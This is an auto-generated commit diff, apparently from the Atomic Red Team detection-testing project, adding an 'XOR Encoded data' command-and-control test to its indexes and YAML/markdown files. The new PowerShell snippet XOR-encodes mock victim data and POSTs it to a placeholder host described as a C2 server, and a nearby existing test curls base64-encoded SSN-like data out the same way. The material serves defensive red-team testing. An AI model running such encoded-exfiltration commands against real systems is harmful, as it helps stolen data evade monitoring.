Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

2021-07-06 20:24:45 +00:00
parent 08b524ecf6
commit 412b05ad26
8 changed files with 85 additions and 3 deletions
@@ -868,6 +868,7 @@ command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Tes
 command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
 command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
 command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
+command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
 command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
 command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
 command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
@@ -535,6 +535,7 @@ command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used p
 command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
 command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
 command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
+command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
 command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
 command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
 execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
@@ -1583,6 +1583,7 @@
  - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
 - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
  - Atomic Test #1: Base64 Encoded data. [macos, linux]
+  - Atomic Test #2: XOR Encoded data. [windows]
 - T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -982,7 +982,8 @@
  - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
  - Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
  - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
- T1132.001 Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
+  - Atomic Test #2: XOR Encoded data. [windows]
 - T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -35,7 +35,7 @@
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) |  |  |  |  | [Remote Access Software](../../T1219/T1219.md) |  |
-|  |  | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) |  |  |  |  | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
+|  |  | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) |  |  |  |  | [Standard Encoding](../../T1132.001/T1132.001.md) |  |
 |  |  | [Local Account](../../T1136.001/T1136.001.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [Local Accounts](../../T1078.003/T1078.003.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1070.004/T1070.004.md) | [Security Account Manager](../../T1003.002/T1003.002.md) |  |  |  |  | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
@@ -66086,6 +66086,38 @@ command-and-control:
          echo -n 111-11-1111 | base64
          curl -XPOST #{base64_data}.#{destination_url}
        name: sh
+    - name: XOR Encoded data.
+      auto_generated_guid: c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08
+      description: |
+        XOR encodes the data with a XOR key.
+        Reference - https://gist.github.com/loadenmb/8254cee0f0287b896a05dcdc8a30042f
+      supported_platforms:
+      - windows
+      input_arguments:
+        destination_url:
+          description: Destination URL to post encoded data.
+          type: string
+          default: example.com
+        plaintext:
+          description: Plain text mimicking victim data sent to C2 server.
+          type: string
+          default: Path\n----\nC:\Users\victim
+        key:
+          description: XOR key used for encoding the plaintext.
+          type: string
+          default: abcdefghijklmnopqrstuvwxyz123456
+      executor:
+        command: |
+          $plaintext = ([system.Text.Encoding]::UTF8.getBytes("#{plaintext}"))
+          $key = "#{key}"
+          $cyphertext =  @();
+          for ($i = 0; $i -lt $plaintext.Count; $i++) {
+           $cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length];
+          }
+          $cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
+          [System.Net.ServicePointManager]::Expect100Continue = $false
+          Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $cyphertext -DisableKeepAlive
+        name: powershell
  T1001.002:
    technique:
      external_references:
@@ -6,6 +6,8 @@

 - [Atomic Test #1 - Base64 Encoded data.](#atomic-test-1---base64-encoded-data)

+- [Atomic Test #2 - XOR Encoded data.](#atomic-test-2---xor-encoded-data)
+

 <br/>

@@ -41,4 +43,48 @@ curl -XPOST #{base64_data}.#{destination_url}



+<br/>
+<br/>
+
+## Atomic Test #2 - XOR Encoded data.
+XOR encodes the data with a XOR key.
+Reference - https://gist.github.com/loadenmb/8254cee0f0287b896a05dcdc8a30042f
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| destination_url | Destination URL to post encoded data. | string | example.com|
+| plaintext | Plain text mimicking victim data sent to C2 server. | string | Path&#92;n----&#92;nC:&#92;Users&#92;victim|
+| key | XOR key used for encoding the plaintext. | string | abcdefghijklmnopqrstuvwxyz123456|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$plaintext = ([system.Text.Encoding]::UTF8.getBytes("#{plaintext}"))
+$key = "#{key}"
+$cyphertext =  @();
+for ($i = 0; $i -lt $plaintext.Count; $i++) {
+ $cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length];
+}
+$cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
+[System.Net.ServicePointManager]::Expect100Continue = $false
+Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $cyphertext -DisableKeepAlive
+```
+
+
+
+
+
+
 <br/>